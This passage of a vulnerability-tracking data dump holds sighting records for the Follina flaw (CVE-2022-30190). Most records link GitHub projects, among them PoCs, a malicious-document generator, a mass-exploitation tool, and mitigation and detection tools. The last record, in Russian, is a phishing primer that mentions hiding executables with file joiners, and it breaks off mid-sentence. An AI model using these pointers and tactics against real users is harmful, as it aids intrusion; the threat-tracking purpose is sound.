"ecfeaff9-ee26-4832-85f2-5fb3af6fb7e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2462", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aServer to host/activate Follina payloads & generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190)\nURL\uff1ahttps://github.com/dsibilio/follina-spring\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T22:51:50.000000Z"}, {"uuid": "30f9b6f9-9f8b-43e9-b57d-4571d29d5fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2461", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aNotes related to CVE-2022-30190\nURL\uff1ahttps://github.com/abhirules27/Follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T21:29:39.000000Z"}, {"uuid": "7a492c1f-3f8a-43e1-933a-b9e426bd5945", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2326", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft Office Word Rce \u590d\u73b0(CVE-2022-30190)\nURL\uff1ahttps://github.com/bytecaps/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T13:19:45.000000Z"}, {"uuid": "9ab94737-5845-43b1-a5c3-78c08734e73d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2325", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190  Follina POC\nURL\uff1ahttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T06:51:55.000000Z"}, {"uuid": "a58c4790-0744-4ca5-9b6d-13ab98ae1cbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2355", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn NSIS script that helps deploy and roll back the mitigation registry patch for CVE-2022-30190 as recommended by Microsoft\nURL\uff1ahttps://github.com/rouben/CVE-2022-30190-NSIS\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T19:05:58.000000Z"}, {"uuid": "38d9e479-dea2-4c0a-bb43-b8a8d2094309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2343", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities\nURL\uff1ahttps://github.com/Kesinger57/CVE-2022-30190-mass\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T09:38:46.000000Z"}, {"uuid": "17447392-e9ce-4883-bfc5-1ae66287c7e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2342", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aFollina MS-MSDT 0-day MS Office RCE (CVE-2022-30190) PoC in Go\nURL\uff1ahttps://github.com/dwisiswant0/gollina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T09:28:12.000000Z"}, {"uuid": "990233c4-fb7c-4d0c-bd8e-9fcb192c361f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2456", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft Support Diagnostic Tool (CVE-2022-30190)\nURL\uff1ahttps://github.com/joshuavanderpoll/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T10:21:21.000000Z"}, {"uuid": "e221e627-9788-4948-836e-13df4592ff95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2473", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)\nURL\uff1ahttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-09T09:37:06.000000Z"}, {"uuid": "ff5a96c7-d2fb-4d2c-9546-8aaa81508d3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2337", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 remediation via removal of ms-msdt from Windows registry\nURL\uff1ahttps://github.com/PaddlingCode/cve-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T23:41:30.000000Z"}, {"uuid": "554f8051-ef5e-4260-a0e1-80169679bd64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2361", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 or \\\"Follina\\\" 0day proof of concept\nURL\uff1ahttps://github.com/rayorole/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T21:45:46.000000Z"}, {"uuid": "310c0377-88db-45db-a305-bb73619bf7db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2468", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept of CVE-2022-30190\nURL\uff1ahttps://github.com/Malwareman007/Deathnote\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-08T11:03:22.000000Z"}, {"uuid": "06ac6a55-762d-4a85-ba2f-dd7045964374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/GithubRedTeam/2506", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1awriteup and poc for [CVE-2022-26809]  CVE-2022-26809 Vulnerabillity in cre windows componen(RPC) with a high cvss score of 9.8\nURL\uff1ahttps://github.com/SonicWave21/Follina-CVE-2022-30190-Unofficial-patch\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-14T13:03:21.000000Z"}, {"uuid": "0474f625-dc6c-4e2d-ab25-1024f804fafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2520", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThese are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\nURL\uff1ahttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-16T20:34:54.000000Z"}, {"uuid": "48b5e66e-9c6b-4691-a7c0-85530ce8cdbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2358", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRemoves the ability for MSDT to run, in response to CVE-2022-30190 (Follina)\nURL\uff1ahttps://github.com/Cosmo121/Follina-Remediation\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T20:38:18.000000Z"}, {"uuid": "ccb6b845-9eba-4d09-9a7a-7a66c523b3aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2369", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)\nURL\uff1ahttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T06:55:29.000000Z"}, {"uuid": "7a6aa9f4-44b4-455b-af1c-23f6185c85e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2329", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190- A Zero-Click RCE Vulnerability In MSDT\nURL\uff1ahttps://github.com/kdk2933/msdt-follina-office\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T17:59:12.000000Z"}, {"uuid": "0e695757-b03a-4943-9044-5862004d13ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2328", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPicking up processes that have triggered ASR related to CVE-2022-30190\nURL\uff1ahttps://github.com/DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T16:14:34.000000Z"}, {"uuid": "b87861ad-3fa5-412a-a66d-725cafa51f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2474", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRepository containing the compromised certificate seen in recent CVE-2022-30190 (Follina) attacks.\nURL\uff1ahttps://github.com/b401/Clickstudio-compromised-certificate\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-09T10:07:52.000000Z"}, {"uuid": "a9029565-1ebd-4ced-af7f-4383b0a63651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2367", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMSDT protocol disabler (CVE-2022-30190 patch tool)\nURL\uff1ahttps://github.com/gamingwithevets/msdt-disable\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T02:49:08.000000Z"}, {"uuid": "0ed376fd-6ba1-426b-91e0-ef52c0fe923f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/GithubRedTeam/2390", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft's recommended mitigation for CVE-2022-30190 using Powershell\nURL\uff1ahttps://github.com/hilt86/cve-2022-30190-mitigate\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-03T06:07:30.000000Z"}, {"uuid": "78020955-bba2-478d-8d8d-b1e0517247f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2853", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Fullstack Academy Cybersecurity project examining the full cycle of the Follina (CVE-2022-30190) vulnerability, from exploit to detection and defense.\nURL\uff1ahttps://github.com/jeffymcjeffface/five-nights-at-follina-s\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-08-05T02:37:51.000000Z"}, {"uuid": "29293b38-533b-4ed8-b5c3-7b01c3374508", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2497", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina \nURL\uff1ahttps://github.com/safakTamsesCS/PicusSecurity4.Week.Repo\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-12T20:51:23.000000Z"}, {"uuid": "2dbcae90-089f-4424-aa91-06f0d0e1d3bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2492", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aproof of concept to CVE-2022-30190 (follina)\nURL\uff1ahttps://github.com/AmitNiz/follina_cve_2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-11T15:52:13.000000Z"}, {"uuid": "d4ebccbc-d828-4181-9675-523d35525bee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3240", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aImplementation of CVE-2022-30190 in C\nURL\uff1ahttps://github.com/mattjmillner/CVE-Smackdown\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-10T18:21:26.000000Z"}, {"uuid": "5866d95c-5477-4613-9628-43aa0dc4028d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2600", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 powerpoint version\nURL\uff1ahttps://github.com/Gra3s/CVE-2022-30190-Follina-PowerPoint-Version\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-29T09:15:48.000000Z"}, {"uuid": "c1822157-6881-466e-9c6c-e68aa33e81b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2751", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aDetection and Remdiation of  the Follina MSDT Vulnerability (CVE-2022-30190)\nURL\uff1ahttps://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-07-21T07:26:21.000000Z"}, {"uuid": "b295642f-ab6b-40a2-9a98-181150426736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3463", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Command Line based python tool for exploit Zero-Day vulnerability in MSDT (Microsoft Support Diagnostic Tool) also know as 'Follina' CVE-2022-30190.\nURL\uff1ahttps://github.com/0xAbbarhSF/FollinaXploit\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-23T23:02:20.000000Z"}, {"uuid": "efb22454-fee1-4393-af05-f3719c92830c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/technical_private_cat/184", "content": "\u0427\u0430\u0441\u0442\u044c 1 - \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f\n\n\u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u043f\u0440\u043e \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044e. \n\u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f  ? \n\u042d\u0442\u043e \u043c\u0435\u0442\u043e\u0434\u044b \u0432\u043b\u0438\u044f\u043d\u0438\u044f \u043d\u0430 \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u0441\u0434\u0435\u043b\u0430\u043b \u0442\u043e \u0447\u0442\u043e \u0431\u044b \u0445\u043e\u0447\u0435\u0448\u044c. \n\n\u041d\u043e \u043a\u0430\u043a\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0445\u0430\u043a\u0435\u0440\u044b \u0438 \u043a\u0430\u043a\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043a \u043d\u0438\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 ? \n\n\u041f\u0435\u0440\u0432\u044b\u0439 \u0438 \u0441\u0430\u043c\u044b\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0432\u0438\u0434 \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u044f \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u044d\u0442\u043e \u0444\u0438\u0448\u0438\u043d\u0433. \n\u0414\u043b\u044f \u043c\u0435\u043d\u044f \u0444\u0438\u0448\u0438\u043d\u0433 \u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f \u043d\u0430 \u0434\u0432\u0430 \u0432\u0438\u0434\u0430 - \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 (\u043a\u0442\u043e \u0448\u0430\u0440\u0438\u0442 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u0440\u0430\u0432\u0438\u0442\u044c) . \n\"\u041c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0432\u0438\u0434\" \u044d\u0442\u043e \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0435 \u043e\u0431\u0449\u0438\u0435 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c \u043f\u0438\u0441\u0435\u043c \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 ,\u0441\u0441\u044b\u043b\u043a\u0430\u043c\u0438, \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u043e\u0431 \u0443\u0433\u0440\u043e\u0437\u0430\u0445 \u0438 \u0442\u0434 \u0441 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043e\u0431\u0449\u0435\u0439 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0435\u0439.  \n\u0410 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u044d\u0442\u043e \u0444\u0438\u0448\u0438\u043d\u0433 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 - \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0437\u0430\u043c\u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 . \u0414\u043b\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u0430-\u043b\u044f OSINT \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u0446\u0435\u043b\u0438 \u0438 \u043f\u043e\u0442\u043e\u043c \u0443\u0436\u0435 \u0433\u0440\u0430\u043c\u043e\u0442\u043d\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438.  \n\u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u0441\u043f\u0440\u044f\u0442\u0430\u0442\u044c exe \u0432 \u043b\u044e\u0431\u043e\u043c \u0434\u0440\u0443\u0433\u043e\u043c \u0444\u043e\u0440\u043c\u0430\u0442\u0435 \u044e\u0437\u0430\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0434\u0436\u043e\u0439\u043d\u0435\u0440\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u043b\u0438 \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u0441 asm exe \u0444\u0430\u043b\u043e\u0432 . \u041f\u043e\u0442\u043e\u043c \u043f\u0440\u0438\u0434\u0443\u043c\u044b\u0432\u0430\u044e \u0431\u043e\u043b\u0435\u0435 \u043b\u0438 \u043c\u0435\u043d\u0435\u0435 \u0443\u0431\u0435\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u043a\u0430\u0437\u043a\u0443 \u0438\u043b\u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442 \u0436\u0435\u0440\u0442\u0432\u0435(\u0430\u043c). \u041f\u0440\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043f\u0440\u0438\u0432\u0435\u0434\u0443 \u0432 \u043f\u0440\u0438\u043c\u0435\u0440 \u0447\u0442\u043e \u043d\u0438\u0442\u044c \u043d\u043e\u0432\u0435\u043d\u044c\u043a\u043e\u0435 \u0442\u0430\u043a\u043e\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0437\u0432\u0441\u0442\u043d\u0430\u044f CVE-2022-30190 \u043d\u0430 \u043d\u0435\u0435 \u0435\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b -  \u0442\u044b\u043a .\n\u0427\u0442\u043e \u043e\u043d\u0430 \u0434\u0435\u043b\u0430\u0435\u0442?  \n\u042d\u0442\u0430  \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS 